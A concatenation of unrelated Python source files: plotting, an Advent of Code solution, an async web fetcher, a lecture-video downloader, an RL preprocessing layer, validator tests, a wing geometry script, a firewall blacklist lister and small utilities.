ax1.plot(d1['X'], d1['CH1'], label='Locked')
ax1.set_xlim(0, 10)
'''ax1.plot(d3['X'], d2['CH1'], label='Chamber')'''
#ax1.plot(d2['X'], d2['CH1'], label='Unlocked')
ax1.legend()
'''ax3 = fig.add_subplot(gs[0, 1])
ax3.set_title('Difference')
ax3.set_ylabel(r'Power ($\mu$W)')
ax3.set_xlabel('Frequency (kHz)')
ax3.plot(diff1['X'], diff1['diff'])
ax3.plot(diff3['X'], diff3['diff'])
ax3.plot(diff5['X'], diff5['diff'], color='green')
ax3.fill_between(diff1['X'], diff1['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Ref - NL, [0, 3 kHz])' % totalp1)
ax3.fill_between(diff3['X'], diff3['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm - NL, [0, 3 kHz])' % totalp3)
ax3.fill_between(diff5['X'], diff5['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm - Ref, [0, 3 kHz])' % totalp5, color='green')
ax3.set_xlim(0, 3)
ax3.legend()
ax2 = fig.add_subplot(gs[1, 0])
ax2.set_title('y-axis FFT')
ax2.set_ylabel(r'Amplitude (dBm)')
ax2.set_xlabel('Frequency (kHz)')
ax2.plot(d2['X'], d3['CH1'], label='Reflection')
ax2.plot(d4['X'], d4['CH1'], label='Chamber')
ax2.plot(d6['X'], d6['CH1'], label='No Light', color='green')
ax2.legend()
ax4 = fig.add_subplot(gs[1, 1])
ax4.set_title('Difference')
ax4.set_ylabel(r'Power ($\mu$W)')
ax4.set_xlabel('Frequency (kHz)')
ax4.plot(diff2['X'], diff2['diff'])
ax4.plot(diff4['X'], diff4['diff'])
ax4.plot(diff6['X'], diff6['diff'], color='green')
ax4.fill_between(diff2['X'], diff2['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Ref-NL, [0, 3 kHz])' % totalp2)
ax4.fill_between(diff4['X'], diff4['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm-NL, [0, 3 kHz])' % totalp4)
ax4.fill_between(diff6['X'], diff6['diff'], alpha=0.5,
label=r'Total Power = %.3f $\mu$W (Chm-Ref, [0, 3 kHz])' % totalp6, color='green')
ax4.set_xlim(0, 3)
ax4.legend()
fig.subplots_adjust(left=0.06, bottom=0.08, right=0.95, top=0.95, wspace=0.12, hspace=0.25)'''
plt.show()
|
StarcoderdataPython
|
11236751
|
<filename>day1/aoc-day1.py
import itertools
def get_frequency(fn: str, start: int = 0) -> int:
"""Takes frequency modulation file and returns final frequency"""
with open(fn) as f:
return start + sum(int(item) for item in f)
def first_repeat(fn: str, start: int = 0) -> int:
"""Finds the first repeating frequency when cycling the modulation file
Note: Updating a dict item-by-item seems faster than set; using dummy dict
"""
seen = {start: 0}
frequency = start
with open(fn) as f:
for modulation in itertools.cycle(f):
frequency += int(modulation)
if frequency in seen:
return frequency
seen[frequency] = 0
if __name__ == "__main__":
frequency = get_frequency("day1-input.txt")
print(f"After one modulation cycle, the frequency is: {frequency}")
repeating_frequency = first_repeat("day1-input.txt")
print(f"The first repeating frequency is: {repeating_frequency}")
|
StarcoderdataPython
|
3309800
|
from typing import Dict, List
import aiohttp
from aiohttp import client_exceptions
import asyncio
import time
import datetime
"""
Usage:
Use this program from another file using the following:
- import async_web_requests
- results = async_web_requests.main_loop(urls_list, output=bool)
"""
# Credits given when credits are due...
# The code here is a bit modified version from a StackOverFlow post's answer:
# https://stackoverflow.com/questions/64335959/how-to-avoid-error-429-too-many-requests-python-with-asyncio
# TODO: I think I could simplify this a bit...
# TODO: I think this could benefit from being a object, didn't think about it when I started...
# TODO: Make a logger.
async def fetch(session: aiohttp.ClientSession, task: dict, output=False):
"""
Fetches one item using URL to the site.
This function should be used from an asychronous function loop...
Parameters
----------
task:
in a format
{
"url": Str to a site
"result": None
"status": int
}
output:
True if any printable output is needed.
"""
try:
async with session.get(task["url"]) as response:
# Correct status.
if response.status == 200:
text = await response.text()
# Gone status. Still taking the text...
elif response.status == 410:
text = await response.text()
# Not found.
elif response.status == 404:
text = "not found"
# Forbidden status.
elif response.status == 403:
text = "forbidden"
# Small await, for some reason :D?
await asyncio.sleep(0.01)
# Sometimes status not in any of the above. Hence this.
else:
text = "unknown"
task["result"] = text
task["status"] = response.status
task["datetime"] = datetime.datetime.now()
except asyncio.CancelledError:
# Just marking the task as new so it will be fetched again, as this error means that
# the fetch_all(...) has been stoped, for too many Forbidden codes in a row.
# The stop helps to get rid of the code faster.
task["result"] = None
task["status"] = "new"
# Is this a real concern?
except client_exceptions.ClientOSError:
task["result"] = None
task["status"] = "forbidden"
except asyncio.TimeoutError:
task["result"] = None
task["status"] = "forbidden"
async def fetch_all(
session: aiohttp.ClientSession,
urls: List[str],
output=False,
task_per_second: int = 1000,
forbidden_max: int = 10,
output_number: int = 100,
):
"""
Fetches multiple sites using a list of URLs given as a parameter.
Handles error code 403 (forbidden) in order to fetch sites that do not want to be scrapped too quicky
Handles unvalid URLs to some extend, etc.
Parameters
----------
urls:
A list containing URLs to sites from which the data will be collected.
task_per_second:
How many tasks the fetcher should try per second, some sites are good to scrap with a low task_per_second number
as these sites do not want to be scrapped, lol. But most sites benefit from 1000 or more,
i.e., low for heterogenous sites, possibly high for homogenous sites!
output:
True if any printable output is needed.
forbidden_max:
A number telling how many forbidden responses can come, before the sleeping.
- Pretty slow on some sites, e.g.,
If a site can have about 2500 requests done in a 1 minute. It will take super long time scrap 25k, different
urls from that site. As the site will keep giving 403 error codes. The 403 handling isn't good, but it works.
It doesn't break and keeps trying to fetch all those sites. It just waits for arbitrary time to before trying
again, lol it works, so it's not that bad. Respecting the sites owner (only use for education purposes!)
"""
start = time.perf_counter()
if output is True:
print("Starting to fetch URLs...")
print(f"Total URLs: {len(urls)}")
url_tasks = [
{"url": url, "result": None, "status": "new", "datetime": None} for url in urls
]
tasks_total = len(url_tasks)
pos = 0
while True:
if pos % 100 == 0 or pos == 0:
start2 = time.perf_counter()
tasks_forbidden = len([i for i in url_tasks if i["status"] in [403]])
if tasks_forbidden > forbidden_max:
if output is True:
print(f"{forbidden_max} or more forbidden responses!")
print("Stopping now...")
# Sleep for some reason?
await asyncio.sleep(2)
break
# fetch = currently fetching
tasks_running = len([i for i in url_tasks if i["status"] in ["fetch"]])
# new = not yet fetched successfully
tasks_waiting = len([i for i in url_tasks if i["status"] == "new"])
# New fetch task if condition is met
if pos < tasks_total and tasks_running < task_per_second:
current_task = url_tasks[pos]
current_task["status"] = "fetch"
asyncio.create_task(fetch(session, current_task))
pos += 1
# Output on every Xth URL
if pos % output_number == 0 and output == 0:
print("Done tasks: {...}")
print(f"Scheduled tasks: {pos}")
print(f"Running now {tasks_running}")
print(f"Remaining tasks: {tasks_waiting}")
print(f"Time taken for {pos} URLs: {time.perf_counter() - start}")
print()
if tasks_running >= task_per_second:
if output == 0:
print("Throttling (2s)...")
await asyncio.sleep(2)
# If still waiting or running tasks, keep loop running.
if tasks_waiting != 0 or tasks_running > 0:
await asyncio.sleep(0.01)
else:
await asyncio.sleep(5)
break
"""
# TODO: Does this have any real effect on the program :D?
# Like why would it really have any effect...?
# Graceful shutdown, needs to run the tasks that are still running
# Does this really do anything :D???
"""
running_now = asyncio.all_tasks()
asyncio.gather(*running_now)
return url_tasks
async def fetcher(
urls: List[str],
output=False,
task_per_second: int = 1000,
forbidden_max: int = 10,
output_number: int = 100,
):
"""
Main function to run the programs here with default parameters, etc...
I don't think that this is even a nessecary function?
Parameters
----------
urls: A list containing urls to be fetch.
A list containing URLs to sites from which the data will be collected.
task_per_second:
How many tasks the fetcher should try per second, some sites are good to scrap with a low task_per_second number
as these sites do not want to be scrapped, lol. But most sites benefit from 1000 or more,
i.e., low for heterogenous sites, possibly high for homogenous sites!
output:
True if any printable output is needed.
forbidden_max:
A number telling how many forbidden responses can come, before the sleeping.
"""
async with aiohttp.ClientSession() as session:
results = await fetch_all(
session, urls, output, task_per_second, forbidden_max, output_number
)
return results
def main_loop(urls: list, output=False):
"""
Main loop that fetches the data, from a list of URLs.
Tries to handle the 403 errors as well as its possible...
TODO: add params...
"""
start = time.perf_counter()
task_results = []
pos = 0
sleep_min = 5
if output is True:
print("Starting main_loop asynch web requests...")
print("Total tasks:", len(urls))
print()
while True:
start2 = time.perf_counter()
pos += 1
# Run the main fetcher function
results = asyncio.get_event_loop().run_until_complete(
fetcher(urls, output=output)
)
# Append those with code any other than 403 or 'new'
[
task_results.append(result)
for result in results
if result["status"] != 403 and result["status"] != "new"
]
if output is True:
__print_fetched(results, task_results, start, start2)
# forbidden_list = get_forbidden_results(results)
urls = __get_forbidden_and_new_urls(results)
if len(urls) == 0:
break
if output is True:
print(f"Forbidden on {len(urls)}, trying again...")
print(f"Time passed: {time.perf_counter() - start}")
print(f"Time passed this lap: {time.perf_counter() - start2}")
sleeper(sleep_min, True)
print()
else:
sleeper(sleep_min, False)
return task_results
def __get_results_by_code(code, results) -> list:
"""
Get a list of results filtered from results dict, using code.
"""
return [i for i in results if i["status"] == code]
def __get_forbidden_and_new_urls(results):
urls = [i["url"] for i in results if i["status"] == 403 or i["status"] == "new"]
return urls
def __print_fetched(results, task_results, start, start2):
codes = [200, 403, 410, 404]
print(f"This lap time: {time.perf_counter() - start2}")
for code in codes:
code_results = __get_results_by_code(code, results)
print(f"Code: {code}...")
print(" ", len(code_results))
print(f"Done now in total: {len(task_results)}")
print(f"Time {time.perf_counter() - start}")
def sleeper(minutes: int = 5, output=True):
for i in range(minutes):
if output is True:
print(f"Sleeping for {minutes - i} minutes...")
time.sleep(60)
if output is True:
print("Sleeping done...")
if __name__ == "__main__":
exit(
f"This program ({__file__}) should be used via the main_loop function it contains, thus, don't directly run the file!"
f"\nSee the file for more details..."
)
|
StarcoderdataPython
|
4911681
|
# Copyright 2018/2019 The RLgraph authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from rlgraph import get_backend
from rlgraph.components.layers.preprocessing import PreprocessLayer
from rlgraph.utils.decorators import rlgraph_api
from rlgraph.utils.util import SMALL_NUMBER
if get_backend() == "tf":
import tensorflow as tf
elif get_backend() == "pytorch":
import torch
class MovingStandardize(PreprocessLayer):
"""
Standardizes inputs using a moving estimate of mean and std.
"""
def __init__(self, batch_size=1, scope="moving-standardize", **kwargs):
"""
Args:
batch_size (int): Number of samples processed per step.
"""
super(MovingStandardize, self).__init__(scope=scope, **kwargs)
self.batch_size = batch_size
self.sample_count = None
# Current estimate of state mean.
self.mean_est = None
# Current estimate of sum of stds.
self.std_sum_est = None
self.output_spaces = None
self.in_shape = None
def create_variables(self, input_spaces, action_space=None):
in_space = input_spaces["preprocessing_inputs"]
self.output_spaces = in_space
self.in_shape = (self.batch_size, ) + in_space.shape
if self.backend == "python" or get_backend() == "python" or get_backend() == "pytorch":
self.sample_count = 0.0
self.mean_est = np.zeros(self.in_shape, dtype=np.float32)
self.std_sum_est = np.zeros(self.in_shape, dtype=np.float32)
elif get_backend() == "tf":
self.sample_count = self.get_variable(name="sample-count", dtype="float", initializer=0.0, trainable=False)
self.mean_est = self.get_variable(
name="mean-est",
shape=self.in_shape,
dtype=tf.float32,
trainable=False,
initializer=tf.zeros_initializer()
)
self.std_sum_est = self.get_variable(
name="std-sum-est",
shape= self.in_shape,
dtype=tf.float32,
trainable=False,
initializer=tf.zeros_initializer()
)
@rlgraph_api
def _graph_fn_reset(self):
if self.backend == "python" or get_backend() == "python" or get_backend() == "pytorch":
self.sample_count = 0.0
self.mean_est = np.zeros(self.in_shape)
self.std_sum_est = np.zeros(self.in_shape)
elif get_backend() == "tf":
return tf.variables_initializer([self.sample_count, self.mean_est, self.std_sum_est])
@rlgraph_api
def _graph_fn_apply(self, preprocessing_inputs):
if self.backend == "python" or get_backend() == "python" or get_backend() == "pytorch":
# https://www.johndcook.com/blog/standard_deviation/
preprocessing_inputs = np.asarray(preprocessing_inputs, dtype=np.float32)
self.sample_count += 1.0
if self.sample_count == 1.0:
self.mean_est[...] = preprocessing_inputs
else:
update = preprocessing_inputs - self.mean_est
self.mean_est[...] += update / self.sample_count
self.std_sum_est[...] += update * update * (self.sample_count - 1.0) / self.sample_count
# Subtract mean.
result = preprocessing_inputs - self.mean_est
# Estimate variance via sum of variance.
if self.sample_count > 1.0:
var_estimate = self.std_sum_est / (self.sample_count - 1.0)
else:
var_estimate = np.square(self.mean_est)
std = np.sqrt(var_estimate) + SMALL_NUMBER
standardized = result / std
if get_backend() == "pytorch":
standardized = torch.Tensor(standardized)
return standardized
elif get_backend() == "tf":
assignments = [tf.assign_add(ref=self.sample_count, value=1.0)]
with tf.control_dependencies(assignments):
# 1. Update vars
assignments = []
update = preprocessing_inputs - self.mean_est
mean_update = tf.cond(
pred=self.sample_count > 1.0,
false_fn=lambda: self.mean_est,
true_fn=lambda: update
)
var_update = update * update * (self.sample_count - 1) / self.sample_count
assignments.append(tf.assign_add(ref=self.mean_est, value=mean_update))
assignments.append(tf.assign_add(ref=self.std_sum_est, value=var_update))
with tf.control_dependencies(assignments):
# 2. Compute var estimate after update.
var_estimate = tf.cond(
pred=self.sample_count > 1,
false_fn=lambda: tf.square(x=self.mean_est),
true_fn=lambda: self.std_sum_est / (self.sample_count - 1)
)
result = preprocessing_inputs - self.mean_est
std = tf.sqrt(x=var_estimate) + SMALL_NUMBER
return result / std
|
StarcoderdataPython
|
1804623
|
<filename>bboard_downloader/scraper.py
import requests
from datetime import datetime
from selenium import webdriver
from selenium.common.exceptions import TimeoutException, WebDriverException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from tqdm import tqdm
HEADERS = {'User-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A'} # http://www.useragentstring.com/index.php?id=19858
def get_driver(browser, executable_path, headless):
if browser == 'chrome':
opts = webdriver.ChromeOptions()
opts.headless = headless
driver = webdriver.Chrome(executable_path=executable_path, options=opts)
elif browser == 'firefox':
opts = webdriver.FirefoxOptions()
opts.headless = headless
driver = webdriver.Firefox(executable_path=executable_path, options=opts)
else:
raise ValueError("The only currently supported browsers are Google Chrome and Mozilla Firefox")
return driver
def is_unauthorized(driver):
unauthorized = False
try:
element = driver.find_element_by_xpath("//h1[@class='recording-failure-title full-page-title ng-scope ng-binding']")
if element.get_attribute("analytics-id") == "recording.failure.unauthorized.title":
unauthorized = True
finally:
return unauthorized
def get_video_src(driver, url, T):
driver.get(url)
try:
recording_title = WebDriverWait(driver, T).until(
EC.presence_of_element_located((By.ID, "recording-name"))
).get_attribute("innerText").replace("/", "-")
recording_date = datetime.strptime(
WebDriverWait(driver, T).until(
EC.presence_of_element_located((By.XPATH, '//span[@ng-if="recordingMenu.model.recordingDate"]'))
).get_attribute("innerText"),
'%b %d, %Y'
).strftime('%Y%m%d')
video_src = driver.find_element_by_id("playback-video-playback-video_html5_api").get_attribute("src")
except TimeoutException:
if is_unauthorized(driver):
raise WebDriverException("Unauthorized request: the recording URL is likely to have expired")
else:
raise TimeoutException("Can't seem to find the video at the specified URL; try to manually increase the maximum waiting time or run the command with --gui for graphical debugging")
finally:
driver.quit()
return recording_title, recording_date, video_src
def download_video(video_src, outdir, recording_date, recording_title='', course_code=None):
outpath = outdir/f"{recording_date}_{recording_title}.mp4" if course_code is None else outdir/f"{course_code}_{recording_date}.mp4"
response = requests.get(video_src, headers=HEADERS, stream=True) # stream allows to iterate over response
total_size_in_bytes= int(response.headers.get('content-length', 0))
block_size = 1024 #1 Kibibyte
progress_bar = tqdm(desc=f"Downloading {recording_title}", total=total_size_in_bytes, unit='iB', unit_scale=True)
with open(outpath, 'wb') as f:
for chunk in response.iter_content(block_size):
progress_bar.update(len(chunk))
f.write(chunk)
progress_bar.close()
|
StarcoderdataPython
|
3280394
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests tools.validators.instance_validator.instance_parser"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from validate import instance_parser
from absl.testing import absltest
_TESTCASE_PATH = os.path.join('.', 'tests', 'fake_instances')
class ParserTest(absltest.TestCase):
def testInstanceValidatorDetectDuplicateKeys(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_duplicate_keys.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectMissingColon(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_missing_colon.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperSpacing(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_spacing.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperTabbing(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_tabbing.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorParseProperFormat(self):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'GOOD',
'good_building_type.yaml'))
self.assertIsNotNone(parse)
def testInstanceValidatorParseProperConnections(self):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'GOOD',
'good_building_connections.yaml'))
self.assertIsNotNone(parse)
def testInstanceValidatorDetectImproperTranslationCompliance(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_translation_compliant.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperTranslationKeys(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_translation_keys.yaml'))
self.assertIsNone(parse)
def testInstanceValidatorDetectImproperUnitsKeys(self):
with self.assertRaises(SystemExit):
parse = instance_parser.parse_yaml(
os.path.join(_TESTCASE_PATH,
'BAD',
'bad_translation_units_format.yaml'))
self.assertIsNone(parse)
if __name__ == '__main__':
absltest.main()
|
StarcoderdataPython
|
9791195
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 4 17:28:37 2016
Example script for generating a transonic airliner wing external geometry.
@author: pchambers
"""
import numpy as np
from airconics import primitives
from airconics import liftingsurface
# ==============================================================================
# Transonic passanger airliner wing geometry example
# (planform similar to that of the Boeing 787 family)
# ==============================================================================
def myDihedralFunctionAirliner(Epsilon):
"""User-defined function describing the variation of dihedral as a function
of the leading edge coordinate"""
BaseDihedral = 7
# A simple model of a loaded wing shape:
return BaseDihedral + Epsilon*Epsilon*10
def myTwistFunctionAirliner(Epsilon):
"""User-defined function describing the variation of twist as a function
of the leading edge coordinate. The coefficients of the polynomial below
come from the following twist values taken off the CRM (used for the AIAA
drag prediction workshops):
Epsilon = 0: twist = 4.24
Epsilon =0.3: twist = 0.593
Epsilon = 1: twist = -3.343"""
return -(6.53*Epsilon*Epsilon - 14.1*Epsilon + 4.24)
def myChordFunctionAirliner(Epsilon):
"""User-defined function describing the variation of chord as a function of
the leading edge coordinate"""
ChordLengths = np.array([0.5, 0.3792, 0.2867, 0.232, 0.1763, 0.1393, 0.1155,
0.093, 0.0713, 0.055, 0.007])
EpsArray = np.linspace(0, 1, 11)
return np.interp(Epsilon, EpsArray, ChordLengths)
def myAirfoilFunctionAirliner(Epsilon, LEPoint, ChordFunct, ChordFactor,
DihedralFunct, TwistFunct):
"""Defines the variation of cross section as a function of Epsilon"""
AfChord = ((ChordFactor*ChordFunct(Epsilon)) /
np.cos(np.radians(TwistFunct(Epsilon))))
Af = primitives.Airfoil(LEPoint, ChordLength=AfChord,
Rotation=DihedralFunct(Epsilon),
Twist=TwistFunct(Epsilon),
CRMProfile=True, CRM_Epsilon=Epsilon)
return Af
def mySweepAngleFunctionAirliner(Epsilon):
"""User-defined function describing the variation of sweep angle as a function
of the leading edge coordinate"""
SweepAngles = np.array([90, 87, 35, 35, 35, 35, 35, 35, 35, 35, 80])
EpsArray = np.linspace(0, 1, 11)
return np.interp(Epsilon, EpsArray, SweepAngles)
if __name__ == "__main__":
import airconics
# Initialise the display
from OCC.Display.SimpleGui import init_display
display, start_display, add_menu, add_function_to_menu = init_display()
# Position of the apex of the wing
P = (0,0,0)
# Class definition
NSeg = 10
# Instantiate the class
ChordFactor = 1
ScaleFactor = 50
# First try a standard CRM airfoil:
# Af_crm = airconics.primitives.Airfoil([0., 6., 1.], CRMProfile=True, CRM_Epsilon=0.8)
# display.DisplayShape(Af_crm.Curve, update=True, color='GREEN');
Wing = liftingsurface.LiftingSurface(P, mySweepAngleFunctionAirliner,
myDihedralFunctionAirliner,
myTwistFunctionAirliner,
myChordFunctionAirliner,
myAirfoilFunctionAirliner, SegmentNo=NSeg, ScaleFactor=ScaleFactor)
#Wing.Display(display)
start_display()
|
StarcoderdataPython
|
9759008
|
from django.core.management.base import BaseCommand, CommandError
from django.contrib.auth.models import User
from rasacore.training import Train
class Command(BaseCommand):
help = 'Training base on core.rasa.ai'
def handle(self, *args, **options):
try:
train_cls = Train()
train_cls.run()
except Exception as ex:
raise CommandError('Error %s ' % str(ex))
self.stdout.write(self.style.SUCCESS('Done training models'))
|
StarcoderdataPython
|
1838348
|
def mul(x, y):
product = 0
while y > 0:
product += x
y -= 1
return product
print(mul(5, 3))
|
StarcoderdataPython
|
1626415
|
""" nftfwls - List data from nftfw blacklist database
"""
import sys
import datetime
from signal import signal, SIGPIPE, SIG_DFL
from pathlib import Path
import argparse
import logging
from prettytable import PrettyTable
from .fwdb import FwDb
from .config import Config
from .geoipcountry import GeoIPCountry
from .stats import duration
log = logging.getLogger('nftfw')
def loaddb(cf, orderby='last DESC'):
"""Load all data in firewall database
Parameters
----------
cf : Config
orderby : str
Sorting order for data
Returns
-------
List[Dict[blacklist database schema]]
"""
db = FwDb(cf)
result = db.lookup('blacklist', orderby=orderby)
return result
def loadactive(cf):
"""Load active ips from firewall directory
Parameters
----------
cf : Config
Returns
-------
List[str]
List of filename stems ending in .auto
in blacklist directory
"""
path = cf.etcpath('blacklist')
out = []
for p in path.glob('*.auto'):
ip = p.stem
ip = ip.replace('|', '/')
out.append(ip)
return out
def activedb(dbdata, active):
"""Reduce database to active entries
Parameters
----------
dbdata : List[Dict[]]
List of database entries
active : List
List of stems in blacklist directory
Returns
-------
List[Dict[active entries database schema]]
"""
out = [e for e in dbdata if e['ip'] in active]
return out
def datefmt(fmt, timeint):
"""Return formatted date - here so it can be changed
in one place
Parameters
----------
fmt : str
Time format from the ini file
timeint : int
Unix timestamp
Returns
-------
str
Formatted string
"""
value = datetime.datetime.fromtimestamp(timeint)
return value.strftime(fmt)
def formatline(date_fmt, pattern_split, line, geoip, is_html=False):
"""Format a single line of data
Parameters
----------
date_fmt : str
Format string from ini file
pattern_split : bool
If true split patterns at comma into
newline and a space
line : Dict(database)
geoip : Instance of the geoip class
is_html : bool
True if HTML output wanted
Returns
-------
List
List of display columns
"""
# Add countrycode to IP if exists
ip = line['ip']
if geoip.isinstalled():
country, iso = geoip.lookup(ip)
if iso is None:
iso = " "
elif is_html:
# if html add abbr so mouseover shows country name
if country is not None:
iso = f'<abbr title="{country}">{iso}</abbr>'
ip = iso + " " + ip
# special handling for last, and duration
if line['first'] == line['last']:
estring = '-'
dstring = '-'
else:
estring = datefmt(date_fmt, line['first'])
dstring = "%8s" % (duration(line['first'], line['last']),)
# deal with the useall flag
pstring = line['ports']
if line['useall']:
pstring = 'all'
# make patterns into two lines
if pattern_split:
pats = "\n ".join(line['pattern'].split(","))
else:
pats = line['pattern']
return ([ip, \
pstring, \
str(line['matchcount']) + '/' + str(line['incidents']), \
datefmt(date_fmt, line['last']), \
estring, \
dstring, \
pats])
def displaytable(cf, dt, noborder=False):
"""Display the data to terminal
Parameters
----------
cf : Config
dt : List[Dict[database]]
Database entries to show
noborder : bool
If true displays no border
"""
# pylint: disable=unsupported-assignment-operation
# doesn't like the assignment to pt.align
# cf values loaded in __main__
fmt = cf.date_fmt
pattern_split = cf.pattern_split
geoip = GeoIPCountry()
pt = PrettyTable()
if noborder:
pt.border = False
pt.header = False
pt.field_names = ['IP'+'('+str(len(dt))+')',
'Port', 'Ct/Incd', 'Latest',
'First', 'Duration', 'Pattern']
for line in dt:
pt.add_row(formatline(fmt, pattern_split, line, geoip))
# set up format
pt.align = 'l'
pt.align['Ct/Incd'] = 'c'
print(pt)
def displayhtml(cf, dt):
"""Display the data as HTML table
Parameters
----------
cf : Config
dt : List[Dict[database]]
Database entries to show
"""
fmt = cf.date_fmt
pattern_split = cf.pattern_split
geoip = GeoIPCountry()
tdata = []
for line in dt:
tdata.append(formatline(fmt, pattern_split, line, geoip, is_html=True))
print('<table class="nftfwls">')
field_names = ['IP'+'('+str(len(dt))+')',
'Port', 'Ct/Incd', 'Latest',
'First', 'Duration', 'Pattern']
htmlrow('heading', field_names)
for line in tdata:
htmlrow('content', line)
print('</table>')
def htmlrow(htmlclass, line):
"""Print an htmlrow
Parameters
----------
htmlclass : str
Class to be added to row
line : List(data)
"""
print(f' <tr class="{htmlclass}">')
ix = 0
for edited in line:
ix = ix + 1
colclass = 'col' + str(ix)
print(f' <td class="{colclass}">', end='')
if ix > 1:
# ip may have html in it
edited = edited.replace(' ', ' ')
edited = edited.replace('\n', '<br>')
print(edited, end='')
print('</td>')
print(' </tr>')
def main():
""" Main action """
#pylint: disable=too-many-branches, too-many-statements
# ignore broken pipe error - thrown when using
# nftfwls into the head command
signal(SIGPIPE, SIG_DFL)
cf = Config()
desc = """nftfwls - list firewall information
Default output is to show active entries sorted by
time of last incident (in descending order)
"""
ap = argparse.ArgumentParser(prog='nftfwls',
formatter_class=argparse.RawDescriptionHelpFormatter,
description=desc)
ap.add_argument('-c', '--config',
help='Supply a configuration file overriding the built-in file')
ap.add_argument('-w', '--web',
help='Print output as an HTML table',
action='store_true')
ap.add_argument('-p', '--pattern-split',
help='Set the pattern-split value to yes or no, overrides value in config.ini',
action='append')
ap.add_argument('-a', '--all',
help='Print database information, don\'t look at firewall directory',
action='store_true')
ap.add_argument('-r', '--reverse',
help='Reverse sense of sorting',
action='store_true')
ap.add_argument('-m', '--matchcount',
help='Sort by counts - largest first',
action='store_true')
ap.add_argument('-i', '--incidents',
help='Sort by incidents - largest first',
action='store_true')
ap.add_argument('-n', '--noborder',
help='Don\'t add borders and title to the table',
action='store_true')
ap.add_argument('-q', '--quiet',
help='Suppress printing of errors on the console, syslog output remains active',
action='store_true')
ap.add_argument('-v', '--verbose',
help='Show information messages',
action='store_true')
args = ap.parse_args()
#
# Sort out config
# but don't init anything as yet
#
try:
cf = Config(dosetup=False)
except AssertionError as e:
cf.set_logger(logprint=False)
emsg = 'Aborted: Configuration problem: {0}'.format(str(e))
log.critical(emsg)
sys.exit(1)
# allow change of config file
if args.config:
file = Path(args.config)
if file.is_file():
cf.set_ini_value_with_section('Locations', 'ini_file', str(file))
else:
cf.set_logger(logprint=False)
log.critical('Aborted: Cannot find config file: %s', args.config)
sys.exit(1)
# Load the ini file if there is one
# options can set new values into the ini setup
# to override
try:
cf.readini()
except AssertionError as e:
cf.set_logger(logprint=False)
emsg = 'Aborted: {0}'.format(str(e))
log.critical(emsg)
sys.exit(1)
if args.quiet:
cf.set_logger(logprint=False)
if args.verbose:
cf.set_logger(loglevel='DEBUG')
try:
cf.setup()
except AssertionError as e:
emsg = 'Aborted: Configuration problem: {0}'.format(str(e))
log.critical(emsg)
sys.exit(1)
orderby = 'last DESC'
if args.reverse:
orderby = 'last'
if args.matchcount:
orderby = 'matchcount DESC, incidents'
if args.reverse:
orderby = 'matchcount, incidents'
if args.incidents:
orderby = 'incidents DESC, matchcount'
if args.reverse:
orderby = 'incidents, matchcount'
if args.pattern_split:
for v in args.pattern_split:
if v == 'yes':
cf.pattern_split = True
elif v == 'no':
cf.pattern_split = False
else:
log.error('Value for -p should be "yes" or "no"')
sys.exit(0)
config = cf.get_ini_values_by_section('Nftfwls')
cf.date_fmt = config['date_fmt']
cf.pattern_split = config['pattern_split']
db = loaddb(cf, orderby=orderby)
if not args.all:
fw = loadactive(cf)
db = activedb(db, fw)
if args.web:
displayhtml(cf, db)
else:
displaytable(cf, db, args.noborder)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3503773
|
from PIL import Image, ImageFont, ImageDraw
def thumbnail(input_file_addr, size=(128, 128)):
"""
Create thumbnail for figure
Parameters
----------
input_file_addr: The input figure address
size: The size of thumbnail (defaule (128, 128))
Returns
-------
image object
"""
image = Image.open(input_file_addr)
image.thumbnail(size)
return image
if __name__ == "__main__":
thumbnail("/home/caesar/Desktop/1.jpg").show()
|
StarcoderdataPython
|
6564956
|
"""Evaluate Theano variables on auxiliary data and during training."""
import logging
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from theano import tensor
